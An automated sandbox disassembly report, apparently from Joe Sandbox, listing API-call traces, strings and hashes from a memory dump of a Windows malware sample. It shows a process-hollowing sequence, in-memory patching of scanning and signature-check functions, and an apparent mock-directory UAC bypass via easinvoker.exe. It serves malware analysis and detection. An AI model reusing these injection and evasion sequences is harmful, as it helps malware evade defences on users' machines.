DllGetClassObject, xrefs: 0415D103, 04160753, 04166EFA
NtOpenSection, xrefs: 0416702C
DlpNotifyPreDragDrop, xrefs: 041665CF
VirtualAlloc, xrefs: 04166BEE
NtReadVirtualMemory, xrefs: 041670C5
sppwmi, xrefs: 04166F11
acS, xrefs: 04162425
CryptSIPVerifyIndirectData, xrefs: 0415CE90
psapi, xrefs: 04166A01
mssip32, xrefs: 0415CE74, 0415CEA7, 0415CEDA
sppc, xrefs: 04166F44, 04166F77
NtCreateSection, xrefs: 0416705F

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: File$Path$Name$AttributesCloseCreateCurrentLibraryMemoryModuleName_ProcessVirtualWrite$AddressDirectoryFreeHandleInetInformationLoadOfflineOpenProcProtectQueryRead
String ID: .png$.url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\System32\\easinvoker.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$advapi32$bcrypt$can$cmd /c "C:\\Windows \\System32\\easinvoker.exe"$connect$endpointdlp$http$iexpress.exe$kernel32$mssip32$ntdll$psapi$smartscreenps$spp$sppc$sppwmi$wintrust$ws2_32
API String ID: 2178617691-2902499223
Opcode ID: f67b1b7f63505c1257df03c2e043f33af5c7b3292713832c6b5e202856b9ca36
Instruction ID: 843f30ae758ad4bf3dbb204f0877f12b2cd5b0b34b56e68e1326c52a54081836
Opcode Fuzzy Hash: f67b1b7f63505c1257df03c2e043f33af5c7b3292713832c6b5e202856b9ca36
Instruction Fuzzy Hash: E7F30D356011198BEB11EB64DDC1BDEB3B9EF88208F1085E6E209A7294DF74FE858F54

Uniqueness

Uniqueness Score: -1.00%

Function 04127E4C Relevance: 43.5, APIs: 8, Strings: 16, Instructions: 1478
nativethreadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0411FD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD70
Part of subcall function 0411FD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD7E
Part of subcall function 0411FD38: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 0411FD97
Part of subcall function 0411FD38: GetCurrentProcess.KERNEL32(0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB3
Part of subcall function 0411FD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB9
Part of subcall function 0411FD38: GetCurrentProcess.KERNEL32(0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE3
Part of subcall function 0411FD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE9
Part of subcall function 0411FD38: FreeLibrary.KERNEL32(74AD0000,00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000), ref: 0411FDF4

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0419A408,0419A3F8,OpenSession,0419A3D0,04129710,ScanString,0419A3D0), ref: 041282D9
GetThreadContext.KERNEL32(000008A0,0419A44C,ScanString,0419A3D0,04129710,UacInitialize,0419A3D0,04129710,ScanBuffer,0419A3D0,04129710,ScanBuffer,0419A3D0,04129710,OpenSession,0419A3D0), ref: 041285CE
NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008A4,0021EFF8,0419A520,00000004,0419A528,ScanBuffer,0419A3D0,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,UacScan,0419A3D0), ref: 0412882B
NtUnmapViewOfSection.N(000008A4,00400000,ScanBuffer,0419A3D0,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,000008A4,0021EFF8,0419A520,00000004,0419A528), ref: 041289A6

Part of subcall function 0411FB80: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0411FB8D
Part of subcall function 0411FB80: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0411FB93
Part of subcall function 0411FB80: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0411FBB3

NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008A4,00400000,00000000,17D2D400,0419A528,ScanBuffer,0419A3D0,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,ScanBuffer,0419A3D0), ref: 04128F89
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008A4,0021EFF8,0419A524,00000004,0419A528,ScanBuffer,0419A3D0,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,000008A4,00400000), ref: 041290FC
SetThreadContext.KERNEL32(000008A0,0419A44C,ScanBuffer,0419A3D0,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,000008A4,0021EFF8,0419A524,00000004,0419A528), ref: 04129272
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008A0,00000000,000008A0,0419A44C,ScanBuffer,0419A3D0,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,000008A4,0021EFF8,0419A524), ref: 0412927F

Part of subcall function 0411FCD8: LoadLibraryW.KERNEL32(bcrypt,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,UacScan,0419A3D0,04129710,UacInitialize,0419A3D0,04129710,000008A0,0419A44C), ref: 0411FCEA
Part of subcall function 0411FCD8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0411FCF7
Part of subcall function 0411FCD8: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008A4,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,UacScan), ref: 0411FD0E
Part of subcall function 0411FCD8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,UacScan,0419A3D0,04129710,UacInitialize,0419A3D0), ref: 0411FD1D

Strings

UacInitialize, xrefs: 041280B5, 041282E9, 041284DE, 041285E2, 041289DE, 04128B52, 0412928B
advapi32, xrefs: 041295A8
ScanBuffer, xrefs: 04127E85, 04127F4F, 04127FD7, 041283CB, 0412846D, 041287A6, 0412892D, 04128AC0, 04128D49, 04128F07, 04129077, 041291EA, 041293DE, 04129643
BCryptQueryProviderRegistration, xrefs: 041294E2
ScanString, xrefs: 04128030, 041281C6, 0412854F, 04128735, 041288BC, 04128CD8, 04128E96, 04129006, 04129179, 04129464, 04129511
I_QueryTagInformation, xrefs: 041295A3
UacScan, xrefs: 04127EF6, 0412810E, 04128653, 04128A4F, 04128BC3, 041292FC
NtOpenObjectAuditAlarm, xrefs: 0412958F
OpenSession, xrefs: 04128237, 0412835A, 041295D2
BCryptRegisterProvider, xrefs: 041294F6
NtReadVirtualMemory, xrefs: 0412957B
Initialize, xrefs: 04128167, 041286C4, 0412884B, 04128C34, 04128E25, 04128F95, 04129108, 0412936D
NtSetSecurityObject, xrefs: 041295B7
BCryptVerifySignature, xrefs: 041294CE
ntdll, xrefs: 04129580, 04129594, 041295BC
bcrypt, xrefs: 041294D3, 041294E7, 041294FB

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: MemoryVirtual$LibraryWrite$AddressProcProcessThread$ContextCurrentFreeHandleLoadModule$AllocateCreateProtectReadResumeSectionUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
API String ID: 1232097254-1058128293
Opcode ID: 5b2604674437283d7ee6695346282ab9caa600a5e6a4c764129587733f1556a2
Instruction ID: 83236d3d6f1e7015aa3b83b38c01e10c173b1b2f947aec9acd5ec0a5761cc789
Opcode Fuzzy Hash: 5b2604674437283d7ee6695346282ab9caa600a5e6a4c764129587733f1556a2
Instruction Fuzzy Hash: 46D20B75B111289BEB11EB68DEC0BCE73B9AF45204F1085B5E208EB254DF70BE968F54

Uniqueness

Uniqueness Score: -1.00%

Function 04105DDC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,04100000,0416A794), ref: 04105DF8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,04100000,0416A794), ref: 04105E16
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,04100000,0416A794), ref: 04105E34
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 04105E52
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,04105EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 04105E9B
RegQueryValueExA.ADVAPI32(?,04106048,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,04105EE1,?,80000001), ref: 04105EB9
RegCloseKey.ADVAPI32(?,04105EE8,00000000,?,?,00000000,04105EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04105EDB
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 04105EF8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 04105F05
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 04105F0B
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 04105F36
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 04105F7D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 04105F8D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 04105FB5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 04105FC5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 04105FEB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 04105FFB

Strings

Software\Borland\Delphi\Locales, xrefs: 04105E48
Software\Borland\Locales, xrefs: 04105E0C, 04105E2A

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 0455fcd24e2c3d721b522e2bc8f5ef475e19e923a32ca4eb1fcd2e4ee089198a
Instruction ID: 6362c597dc32e3221ef2763d48101d06e2a9dccf772ddda9eb18357ec269bd2f
Opcode Fuzzy Hash: 0455fcd24e2c3d721b522e2bc8f5ef475e19e923a32ca4eb1fcd2e4ee089198a
Instruction Fuzzy Hash: 75517875A4025C7EFB21D6A4CCC6FEF7BAD9B04744F5080A1A604E61C1D7F9BA548F50

Uniqueness

Uniqueness Score: -1.00%

Function 0411FD38 Relevance: 12.1, APIs: 8, Instructions: 65
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD70
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD7E
GetProcAddress.KERNEL32(74AD0000,00000000), ref: 0411FD97
GetCurrentProcess.KERNEL32(0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB3
NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB9
GetCurrentProcess.KERNEL32(0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE3
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE9
FreeLibrary.KERNEL32(74AD0000,00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000), ref: 0411FDF4

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CurrentLibraryMemoryProcessVirtual$AddressFreeHandleLoadModuleProcProtectWrite
String ID:
API String ID: 1488642996-0
Opcode ID: bf5f6291a6b88863f63cc6f771b7c7f1d0c1486223fecc91b572b90ce376ee08
Instruction ID: 09b0682434af37a4facab0476b1c46da4497b800a8c2ba90e4f56bbaade54235
Opcode Fuzzy Hash: bf5f6291a6b88863f63cc6f771b7c7f1d0c1486223fecc91b572b90ce376ee08
Instruction Fuzzy Hash: F2114F70600244ABEB00FBB9CEC2A5E77E8DF44658F548120F208E72D0CBB4BE658B18

Uniqueness

Uniqueness Score: -1.00%

Function 0411FCD8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,UacScan,0419A3D0,04129710,UacInitialize,0419A3D0,04129710,000008A0,0419A44C), ref: 0411FCEA
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0411FCF7
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(000008A4,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,UacScan), ref: 0411FD0E
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,04129710,ScanString,0419A3D0,04129710,Initialize,0419A3D0,04129710,UacScan,0419A3D0,04129710,UacInitialize,0419A3D0), ref: 0411FD1D

Strings

BCryptVerifySignature, xrefs: 0411FCF5
bcrypt, xrefs: 0411FCE9

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
Instruction ID: 96033809526fc8f444f7e99e1a9ec613efbf8d0283e7b8b95e6265c1dc852b54
Opcode Fuzzy Hash: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
Instruction Fuzzy Hash: BAF0E9712096146DF610A2245CC0EBF369CCBC1774F148739F5548A1C0D7A1AD0582B9

Uniqueness

Uniqueness Score: -1.00%

Function 0411FB7E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0411FB8D
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0411FB93
NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0411FBB3

Strings

NtAllocateVirtualMemory, xrefs: 0411FB83
C:\Windows\System32\ntdll.dll, xrefs: 0411FB88

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 421316089-2206134580
Opcode ID: 3ccc60afbcc6dfb6967a35f276ae12d7993465d769aef3e90d85a7a938b13a1c
Instruction ID: 3801104b255b35d445400da932c82c1594f67a7a93c3bdee8b9b330a617e5e8b
Opcode Fuzzy Hash: 3ccc60afbcc6dfb6967a35f276ae12d7993465d769aef3e90d85a7a938b13a1c
Instruction Fuzzy Hash: 17E075B6240248BBDB40DF99D985EDB37ECEB08650B408015BA18D7141DB74E9548B69

Uniqueness

Uniqueness Score: -1.00%

Function 0411FB80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0411FB8D
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0411FB93
NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0411FBB3

Strings

NtAllocateVirtualMemory, xrefs: 0411FB83
C:\Windows\System32\ntdll.dll, xrefs: 0411FB88

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 421316089-2206134580
Opcode ID: f7bf3b1dc5239f7d37bf88128e9087be4a251f2c0e5d0ee95438e958c9c2c328
Instruction ID: 1a689abbf619d46a9927bb9e03e9b1495824c3f34ad5cbeac89282f260c8472d
Opcode Fuzzy Hash: f7bf3b1dc5239f7d37bf88128e9087be4a251f2c0e5d0ee95438e958c9c2c328
Instruction Fuzzy Hash: B0E075B6240248ABDB40DF99D985EDB37ECAB08650B408015BA18D7141DB74E9548B69

Uniqueness

Uniqueness Score: -1.00%

Function 0415B768 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 04105228: SysAllocStringLen.OLEAUT32(?,?), ref: 04105236

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0415B838), ref: 0415B7A3
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0415B838), ref: 0415B7D3
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0415B7E8
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0415B814
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0415B81D

Part of subcall function 04104F68: SysFreeString.OLEAUT32(0415C89C), ref: 04104F76

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: 62257a8e659e3b000c1edc7fcd5645a46073641cf92065a0aa25139f5b1e4c6b
Instruction ID: cb6ae6a16f5439dc3882a1c3043d1f4b941d87ed0e28037094b4cf8a9ce789f5
Opcode Fuzzy Hash: 62257a8e659e3b000c1edc7fcd5645a46073641cf92065a0aa25139f5b1e4c6b
Instruction Fuzzy Hash: A4212C71A80219BAEB10EAA4CDC2FDFB7ACEB08704F504461B610E71D0DBB4BA148B94

Uniqueness

Uniqueness Score: -1.00%

Function 0415BB38 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0415BC76

Strings

OpenSession, xrefs: 0415BC18
ScanBuffer, xrefs: 0415BBBF
Initialize, xrefs: 0415BB66

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 72d016c10589a40286921bde3fb946e432b50da35df657baf54cab27db7a90a3
Instruction ID: 886a8fe4d4e901bd45c17386200fa936409aab3f9611a6e067e324a61ba1fde7
Opcode Fuzzy Hash: 72d016c10589a40286921bde3fb946e432b50da35df657baf54cab27db7a90a3
Instruction Fuzzy Hash: 19412E35B05108DBEB01EBA4D9C1EDEB3B9EF98204F618435E660B72A0DFB4BD058B54

Uniqueness

Uniqueness Score: -1.00%

Function 0415B684 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON

Download Yara Rule

APIs

Part of subcall function 04105228: SysAllocStringLen.OLEAUT32(?,?), ref: 04105236

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0415B756), ref: 0415B6C3
NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0415B6FD
NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0415B72A
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0415B733

Memory Dump Source

Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true

Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd

Similarity

API ID: FilePath$AllocCloseCreateNameName_StringWrite
String ID:
API String ID: 3764614163-0
Opcode ID: 2126ae12a6544d50e86e3173223823774f6172fed8ad9ad395ca72af591dfd9e
Instruction ID: 6c43658a83729faa3eee22e8eec11e326440321b2d3da927eac038a8e603fb70
